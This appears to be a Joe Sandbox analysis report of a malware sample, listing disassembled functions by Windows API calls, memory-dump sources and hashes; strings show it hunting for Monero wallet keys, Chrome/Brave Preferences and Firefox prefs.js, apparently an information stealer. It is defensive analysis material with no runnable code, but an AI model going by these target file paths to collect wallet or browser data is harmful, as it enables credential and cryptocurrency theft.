                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
                        • Instruction ID: 2f885508560eb3147bf85ba41b9233855b7396c67be83b70d7ed345f3221c916
                        • Opcode Fuzzy Hash: c96eeb9b53b05a3ea330fb6a75bb3e0afbba80f7cc68fa6e072178efff4e70b6
                        • Instruction Fuzzy Hash: C5F0E971641204BBEB149AA49C49FEFB7DCE705715F300548F504E7380D5725E00DA64
                        Function 00691190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
                          • Part of subcall function 006A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
                          • Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F
                          • Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
                          • Part of subcall function 006A7850: RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
                          • Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F
                        • ExitProcess.KERNEL32 ref: 006911C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: e76d2a28ae3d136c8f20c2792a1a606400c444f8823396cc92cb39e2c875a910
                        • Instruction ID: 069b4097e3ab851f671e0b413abcd8490f37df45d57493c7641bfed0db800985
                        • Opcode Fuzzy Hash: e76d2a28ae3d136c8f20c2792a1a606400c444f8823396cc92cb39e2c875a910
                        • Instruction Fuzzy Hash: 64E012B5E1430667CE4473F0BC0AB2A339EAB16745F24053DFA05D7602FE29EC00896E

                        Non-executed Functions

                        Function 006A38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 006A38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A38E3
                        • lstrcat.KERNEL32(?,?), ref: 006A3935
                        • StrCmpCA.SHLWAPI(?,006B0F70), ref: 006A3947
                        • StrCmpCA.SHLWAPI(?,006B0F74), ref: 006A395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A3C67
                        • FindClose.KERNEL32(000000FF), ref: 006A3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 2d765703e18634c78011aa54b06bd933565cfdbb600346cb2bf94e1a92639efd
                        • Instruction ID: 20e52f465083ef5fd0fac77f294b9d47b1ae6227ce56a8850a7838f7d2aead7f
                        • Opcode Fuzzy Hash: 2d765703e18634c78011aa54b06bd933565cfdbb600346cb2bf94e1a92639efd
                        • Instruction Fuzzy Hash: 96A141B1A002189BDB64EFA4DC85FFA737DBB55300F044599B60D96241EB749B84CF62
                        Function 0069BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,006B0B32,006B0B2B,00000000,?,?,?,006B13F4,006B0B2A), ref: 0069BEF5
                        • StrCmpCA.SHLWAPI(?,006B13F8), ref: 0069BF4D
                        • StrCmpCA.SHLWAPI(?,006B13FC), ref: 0069BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0069C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 319c7a2a0fdec23b515ffa32505662343665e4e32e61e2d8ddaceb5b6141c000
                        • Instruction ID: 907bcddabd7be63391425107170f1cb041b3818e40ffaf6835fa826e699cad55
                        • Opcode Fuzzy Hash: 319c7a2a0fdec23b515ffa32505662343665e4e32e61e2d8ddaceb5b6141c000
                        • Instruction Fuzzy Hash: 36425272910104ABCF94FBA0DD96EEE737EAB85300F40455DB90A96181EF349F49CFA6
                        Function 006A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 006A492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A4943
                        • StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
                        • StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
                        • FindClose.KERNEL32(000000FF), ref: 006A4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: bd00ffae60240f6ffd80612f50b185dda78bcbcfefb52adfe0cbf436d1d14f1a
                        • Instruction ID: e7af09bcc0e978bf090a0b3b81245dfb338b62147468584e5292ac1bf5f4bf98
                        • Opcode Fuzzy Hash: bd00ffae60240f6ffd80612f50b185dda78bcbcfefb52adfe0cbf436d1d14f1a
                        • Instruction Fuzzy Hash: 156153B1900218ABCB24EBA0DC45EFB777DBB89700F04869DB50996141EF75EB85CFA1
                        Function 006A4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006A4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A4587
                        • wsprintfA.USER32 ref: 006A45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A45BD
                        • StrCmpCA.SHLWAPI(?,006B0FC4), ref: 006A45EB
                        • StrCmpCA.SHLWAPI(?,006B0FC8), ref: 006A4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A468B
                        • FindClose.KERNEL32(000000FF), ref: 006A46A0
                        • lstrcat.KERNEL32(?,0126F990), ref: 006A46C5
                        • lstrcat.KERNEL32(?,0126E650), ref: 006A46D8
                        • lstrlen.KERNEL32(?), ref: 006A46E5
                        • lstrlen.KERNEL32(?), ref: 006A46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 043cd72f4514dac950dcd8e43a98f3bb18d1b4269a799074034739b689a6f334
                        • Instruction ID: 78c2baba4b163057d7d3b1660accaa0486bf134a0ce68c5b62cff82a339c8907
                        • Opcode Fuzzy Hash: 043cd72f4514dac950dcd8e43a98f3bb18d1b4269a799074034739b689a6f334
                        • Instruction Fuzzy Hash: 7C5164B1900218ABCB64FBB0DC89FEA737DBB59300F404699F60996150EF74DB848F91
                        Function 006A3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 006A3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A3EDA
                        • StrCmpCA.SHLWAPI(?,006B0FAC), ref: 006A3F08
                        • StrCmpCA.SHLWAPI(?,006B0FB0), ref: 006A3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A406C
                        • FindClose.KERNEL32(000000FF), ref: 006A4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 66a5df0586b550f48f8ec3ca08b46a5caeb49aa5409b0b53d6705b2aeee30cf4
                        • Instruction ID: 7340711d45537928c68b28568ad0fa737948d98c5aa643446a137ccb8e4546d9
                        • Opcode Fuzzy Hash: 66a5df0586b550f48f8ec3ca08b46a5caeb49aa5409b0b53d6705b2aeee30cf4
                        • Instruction Fuzzy Hash: 545164B2900218ABCB24FBB0DC85EFA737DBB45300F00469DB65996150EB75EB85CF95
                        Function 0069ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0069ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0069ED55
                        • StrCmpCA.SHLWAPI(?,006B1538), ref: 0069EDAB
                        • StrCmpCA.SHLWAPI(?,006B153C), ref: 0069EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0069F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 2953c5a68a0ef6b6f7fef7c1ccbcbdc753dbeaeab935c7099b068255bcdabbe5
                        • Instruction ID: 502f5b7172d0d6fee96857b944c4b31eacfaa5d7d66d16dd799ac695809d33f3
                        • Opcode Fuzzy Hash: 2953c5a68a0ef6b6f7fef7c1ccbcbdc753dbeaeab935c7099b068255bcdabbe5
                        • Instruction Fuzzy Hash: CCE1DF729121189ADBD4FBA0DC52EEE737AAF55300F40419EB50B62092EF346F8ACF55
                        Function 0069F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B15B8,006B0D96), ref: 0069F71E
                        • StrCmpCA.SHLWAPI(?,006B15BC), ref: 0069F76F
                        • StrCmpCA.SHLWAPI(?,006B15C0), ref: 0069F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0069FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 9ec18d8b93a9ff7ec5e9b97c26a4b84cf916b524fd4a764bc84f7fb016818d4b
                        • Instruction ID: b5cfb7fe95220b7486b933b468c914af5e9bc576d49a8229cb698dacd42630bf
                        • Opcode Fuzzy Hash: 9ec18d8b93a9ff7ec5e9b97c26a4b84cf916b524fd4a764bc84f7fb016818d4b
                        • Instruction Fuzzy Hash: E3B155719001089FDBA4FFA0DC55AEE737AAF55300F5085ADA40A9B181EF34AF49CF96
                        Function 006916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B510C,?,?,?,006B51B4,?,?,00000000,?,00000000), ref: 00691923
                        • StrCmpCA.SHLWAPI(?,006B525C), ref: 00691973
                        • StrCmpCA.SHLWAPI(?,006B5304), ref: 00691989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00691D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00691DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00691E20
                        • FindClose.KERNEL32(000000FF), ref: 00691E32
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
